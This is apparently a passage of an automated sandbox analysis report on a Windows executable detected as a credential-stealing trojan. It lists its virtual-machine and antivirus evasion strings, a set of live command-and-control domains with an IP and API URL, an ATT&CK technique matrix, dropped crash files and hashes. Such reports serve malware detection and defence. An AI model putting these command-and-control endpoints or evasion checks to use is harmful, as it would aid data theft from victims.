      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exe TID: 5440Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exe TID: 6388Thread sleep time: -30000s >= -30000sJump to behavior
      Source: Amcache.hve.4.drBinary or memory string: VMware
      Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
      Source: Amcache.hve.4.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
      Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
      Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
      Source: iOnDpwrkWY.exe, 00000000.00000002.1913661847.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, iOnDpwrkWY.exe, 00000000.00000003.1787298196.0000000000B36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
      Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: iOnDpwrkWY.exe, 00000000.00000002.1913847473.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, iOnDpwrkWY.exe, 00000000.00000003.1787465167.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, iOnDpwrkWY.exe, 00000000.00000003.1787298196.0000000000B7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.4.drBinary or memory string: vmci.sys
      Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
      Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.4.drBinary or memory string: VMware20,1
      Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
      Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0043C1F0 LdrInitializeThunk,0_2_0043C1F0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_009F092B mov eax, dword ptr fs:[00000030h]0_2_009F092B
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_009F0D90 mov eax, dword ptr fs:[00000030h]0_2_009F0D90
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00AF9893 push dword ptr fs:[00000030h]0_2_00AF9893

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: iOnDpwrkWY.exeString found in binary or memory: rapeflowwj.lat
      Source: iOnDpwrkWY.exeString found in binary or memory: crosshuaht.lat
      Source: iOnDpwrkWY.exeString found in binary or memory: sustainskelet.lat
      Source: iOnDpwrkWY.exeString found in binary or memory: aspecteirs.lat
      Source: iOnDpwrkWY.exeString found in binary or memory: energyaffai.lat
      Source: iOnDpwrkWY.exeString found in binary or memory: necklacebudi.lat
      Source: iOnDpwrkWY.exeString found in binary or memory: discokeyus.lat
      Source: iOnDpwrkWY.exeString found in binary or memory: grannyejh.lat
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
      Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
      Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      PowerShell
      1
      DLL Side-Loading
      1
      Process Injection
      1
      Virtualization/Sandbox Evasion
      OS Credential Dumping11
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading
      1
      Process Injection
      LSASS Memory1
      Virtualization/Sandbox Evasion
      Remote Desktop Protocol2
      Clipboard Data
      2
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
      Deobfuscate/Decode Files or Information
      Security Account Manager1
      Process Discovery
      SMB/Windows Admin SharesData from Network Shared Drive113
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
      Obfuscated Files or Information
      NTDS2
      System Information Discovery
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script22
      Software Packing
      LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      iOnDpwrkWY.exe68%ReversingLabsWin32.Trojan.StealC
      iOnDpwrkWY.exe100%AviraHEUR/AGEN.1312567
      iOnDpwrkWY.exe100%Joe Sandbox ML
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://discokeyus.lat/api%%100%Avira URL Cloudmalware
      https://discokeyus.lat/100%Avira URL Cloudmalware
      https://discokeyus.lat/api100%Avira URL Cloudmalware
      NameIPActiveMaliciousAntivirus DetectionReputation
      discokeyus.lat
      172.67.197.170
      truetrue
        unknown
        NameMaliciousAntivirus DetectionReputation
        sustainskelet.latfalse
          high
          crosshuaht.latfalse
            high
            rapeflowwj.latfalse
              high
              https://discokeyus.lat/apitrue
              • Avira URL Cloud: malware
              unknown
              aspecteirs.latfalse
                high
                grannyejh.latfalse
                  high
                  energyaffai.latfalse
                    high
                    discokeyus.latfalse
                      high
                      necklacebudi.latfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://discokeyus.lat/api%%iOnDpwrkWY.exe, 00000000.00000003.1787298196.0000000000B61000.00000004.00000020.00020000.00000000.sdmp, iOnDpwrkWY.exe, 00000000.00000002.1913847473.0000000000B64000.00000004.00000020.00020000.00000000.sdmp, iOnDpwrkWY.exe, 00000000.00000003.1787570381.0000000000B63000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://upx.sf.netAmcache.hve.4.drfalse
                          high
                          https://discokeyus.lat/iOnDpwrkWY.exe, 00000000.00000002.1913632237.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, iOnDpwrkWY.exe, 00000000.00000002.1913699245.0000000000B4B000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          172.67.197.170
                          discokeyus.latUnited States
                          13335CLOUDFLARENETUStrue
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1577604
                          Start date and time:2024-12-18 15:51:59 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 5m 33s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:10
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:iOnDpwrkWY.exe
                          renamed because original name is a hash value
                          Original Sample Name:019df8734cd00261a66f10e3a4f697da.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@2/5@1/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 90%
                          • Number of executed functions: 13
                          • Number of non-executed functions: 220
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 104.208.16.94, 20.190.177.146, 4.245.163.56, 13.107.246.63
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: iOnDpwrkWY.exe
                          TimeTypeDescription
                          09:53:31API Interceptor2x Sleep call for process: iOnDpwrkWY.exe modified
                          09:53:44API Interceptor1x Sleep call for process: WerFault.exe modified
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          172.67.197.170hzD92yQcTT.exeGet hashmaliciousLummaCBrowse
                            V-Mail_maryland.gov.htmlGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                              https://simanis.sman5semarang.sch.id/kro/Get hashmaliciousUnknownBrowse
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                discokeyus.lathzD92yQcTT.exeGet hashmaliciousLummaCBrowse
                                • 172.67.197.170
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                CLOUDFLARENETUSrandom.exe.7.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                • 104.21.12.88
                                ji2xlo1f.exeGet hashmaliciousLummaCBrowse
                                • 104.21.66.86
                                https://heyzine.com/flip-book/f976862c0c.htmlGet hashmaliciousUnknownBrowse
                                • 172.67.73.205
                                H3G7Xu6gih.exeGet hashmaliciousRHADAMANTHYSBrowse
                                • 162.159.61.3
                                HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                • 162.159.61.3
                                DocuStream_Scan_l8obgs3v.pdfGet hashmaliciousHTMLPhisherBrowse
                                • 104.18.95.41
                                Armanivenntii_crypted_EASY.exeGet hashmaliciousLummaCBrowse
                                • 172.67.157.254
                                random.exe.2.exeGet hashmaliciousLummaCBrowse
                                • 104.21.64.80
                                aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                • 172.67.157.254
                                aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                • 172.67.157.254
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                a0e9f5d64349fb13191bc781f81f42e1greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                • 172.67.197.170
                                qth5kdee.exeGet hashmaliciousLummaCBrowse
                                • 172.67.197.170
                                LgendPremium.exeGet hashmaliciousLummaCBrowse
                                • 172.67.197.170
                                random.exe.7.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                • 172.67.197.170
                                ji2xlo1f.exeGet hashmaliciousLummaCBrowse
                                • 172.67.197.170
                                f86nrrc6.exeGet hashmaliciousLummaCBrowse
                                • 172.67.197.170
                                Armanivenntii_crypted_EASY.exeGet hashmaliciousLummaCBrowse
                                • 172.67.197.170
                                random.exe.2.exeGet hashmaliciousLummaCBrowse
                                • 172.67.197.170
                                aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                • 172.67.197.170
                                aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                • 172.67.197.170
                                No context
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.9708896081195035
                                Encrypted:false
                                SSDEEP:96:buh06miifsFzhrFR72f3QXIDcQzc621ncEscw3T+HbHg/8BRTf3Oy1E45WAU6NCc:SE5f+0dMnmsju3mmzuiFshZ24IO8e
                                MD5:199B19287E8ACE5E081A76952E1D7ADD
                                SHA1:04DC07CDB2DD13C1FC2DFB3F342C1085EC3822DC
                                SHA-256:38C74054540DDDCFD16EA83E72BA726C7994BC103AB3572142D8368B95E6A02C
                                SHA-512:936439F59639E1D0D4AA3BFC3644380290C2CE088F757331300E22D13011476F06342F53C3DBD8579A7001BE3F360EF489B02ECFCA93A6D4396705B634050C1B
                                Malicious:true
                                Reputation:low
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.0.7.2.1.3.6.8.4.2.2.5.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.0.7.2.1.4.1.6.8.5.9.6.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.c.b.b.6.d.2.e.-.1.3.5.5.-.4.3.c.8.-.a.5.d.b.-.9.1.b.7.0.e.2.4.0.5.d.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.7.0.8.5.2.8.a.-.d.6.e.4.-.4.6.3.a.-.8.a.f.3.-.3.c.b.2.9.0.7.b.2.2.8.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.i.O.n.D.p.w.r.k.W.Y...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.e.8.-.0.0.0.1.-.0.0.1.4.-.3.5.b.d.-.f.1.9.4.5.c.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.a.b.f.8.b.8.a.a.e.9.0.4.7.5.a.6.0.7.5.f.7.b.0.e.8.3.d.c.c.d.c.0.0.0.0.f.f.f.f.!.0.0.0.0.6.f.2.f.9.e.f.3.f.1.d.e.b.5.3.a.6.f.b.4.c.c.e.f.9.9.9.9.6.b.6.2.1.5.5.3.f.6.a.3.!.i.O.n.D.p.w.r.k.W.Y...e.x.e.....T.a.r.g.e.t.A.p.p.
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 15 streams, Wed Dec 18 14:53:33 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):45494
                                Entropy (8bit):2.55200558526233
                                Encrypted:false
                                SSDEEP:192:er6CkXroSd3Ox1BS56Zpj3rTXZM604/3bbcp08czPwpxIN:XoSdeTBK6nT/PrbhzzPwkN
                                MD5:C46B073815DC35E25F6EBB8FEE69B013
                                SHA1:3A3FF7F31302A2B07EBFC159596872872979C3FA
                                SHA-256:4FC541CD6D580084F3CA828B9B986D975F4C5AD44C62F2CE12E3C2E8E5AF1EDF
                                SHA-512:DA1C8477495E1A1DD64CBD08D3BA626503BE6EAD35748E35EFC10CAF6DF7BC78DDBA58C0DE0AF95746A8A41CCF3226ED9C7164AD37B5A50147842B27A649A1FE
                                Malicious:false
                                Reputation:low
                                Preview:MDMP..a..... .........bg............4...............H.......<...........t....,..........`.......8...........T...........H@..nq..........P...........< ..............................................................................eJ....... ......GenuineIntel............T.............bg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8316
                                Entropy (8bit):3.6984993414546765
                                Encrypted:false
                                SSDEEP:192:R6l7wVeJeV6mO6YSNSUX2ZPGgmfS+XpDj89bXW2Tsfjdm:R6lXJk6mO6YISUX2AgmfS+GXW24fU
                                MD5:6EC410D6D730DA060852B5440AA014D9
                                SHA1:A36C2D66532D8C0A4CF3BAF3F1CCAF316CB8A459
                                SHA-256:4A52685F5C2CD1E68E0BF478AAB03B83CD418E15F249D5935E6BF613D1649BA3
                                SHA-512:4EF3349B9BBF0E7D524C632FD230EA82D203B7182209712589FE34DF0379AE7373FA2BC7F15EAEB317758ACE5BEE809A204081C19A863EC3490DF2CC86CE13A9
                                Malicious:false
                                Reputation:low
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.0.8.<./.P.i.
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4579
                                Entropy (8bit):4.471807775697792
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsiJg77aI9rwWpW8VY1Ym8M4JpK20F4+q8s5pOT8Z1zSEd:uIjfwI7pJ7VNJnsT8Z1zSEd
                                MD5:0A224D93EA2584001D678B355B589ACC
                                SHA1:9B8CBE00FE0D04875ADB899DC60F77BA9EDCD4D8
                                SHA-256:2DD03360437A14B069447921D71CAABB82FF45E896CAA6222DD0322AD44272C1
                                SHA-512:69CFBE20EE5ADD4D3C5DFAA599007EBAB4B590C1E5A9B2871EC419B3B9CFF5F2338B580A2EC85DFC2C0181DD0C250D35863790FB276C0CC57282393B36C9B677
                                Malicious:false
                                Reputation:low
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636836" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:MS Windows registry file, NT/2000 or above
                                Category:dropped
                                Size (bytes):1835008
                                Entropy (8bit):4.372071103332668
                                Encrypted:false
                                SSDEEP:6144:uFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNSiL:+V1QyWWI/glMM6kF7Mq
                                MD5:256A32ECE55941EC8E8459384E665AED
                                SHA1:066D0D976D26E1514CD9A238DCA90F1F0B78AD45
                                SHA-256:F21A80D75259ACD1A84535DB96E4A728820A5F42E1487B0DF0E0EB86A3D66E70
                                SHA-512:09E7ADA4194B3B6795FFB21553E42803D6242E025B522BEA69CD568579D8D9B2DD9F50515E72E138A95782E3FBD881BFB61B36E6BFB4B8C907F45BEA5191F802
                                Malicious:false
                                Reputation:low
                                Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...\Q..............................................................................................................................................................................................................................................................................................................................................|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):6.683240924231495
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:iOnDpwrkWY.exe
                                File size:368'640 bytes
                                MD5:019df8734cd00261a66f10e3a4f697da
                                SHA1:6f2f9ef3f1deb53a6fb4ccef99996b621553f6a3
                                SHA256:2dabada3f7cc07a575e2344dc8a2f835517695fcfe55462b9a464a975d5a8af8
